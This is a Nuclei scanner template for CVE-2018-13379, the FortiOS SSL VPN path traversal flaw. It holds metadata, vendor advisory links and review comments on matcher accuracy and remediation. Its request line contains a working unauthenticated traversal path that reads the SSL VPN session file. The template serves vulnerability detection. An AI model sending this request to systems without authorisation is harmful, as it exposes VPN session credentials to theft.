CVE-2018-13379.yaml
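# Nuclei detection template for CVE-2018-13379 (path traversal, CWE-22, in the
# Fortinet SSL VPN web portal). It sends one unauthenticated GET to
# /remote/fgt_lang with a traversal sequence in the `lang` parameter that
# points at the sslvpn_websession file, and reports a finding when the
# response contains the string "var fgt_lang".
#
# The nesting below was restored: with every key at column 0, `path` and
# `matchers` parse as top-level keys instead of fields of the request, and
# the `info` fields are detached from `info`.
id: CVE-2018-13379

info:
  name: FortiOS - Credentials Disclosure
  author: organiccrap
  severity: critical
  tags: cve,cve2018,fortios
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2018-13379
    cwe-id: CWE-22
  description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests."
  # Vendor advisories; the affected version ranges are the ones listed in the
  # description above.
  reference:
    - https://fortiguard.com/advisory/FG-IR-18-384
    - https://www.fortiguard.com/psirt/FG-IR-20-233

requests:
  - method: GET
    path:
      - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    matchers:
      # NOTE(review): the only condition is one substring in the body; there
      # is no status-code or content check. If a fixed build also emits
      # "var fgt_lang" for this request, the template reports a false
      # positive. Confirm against a patched device, and consider pairing this
      # with a `status` matcher under `matchers-condition: and`.
      # NOTE(review): a match means the traversal request was served. Going by
      # the template name, treat a hit as possible exposure of SSL VPN session
      # credentials: patch per the advisories and rotate affected credentials.
      - type: word
        part: body  # explicit; body is the default part for word matchers
        words:
          - "var fgt_lang"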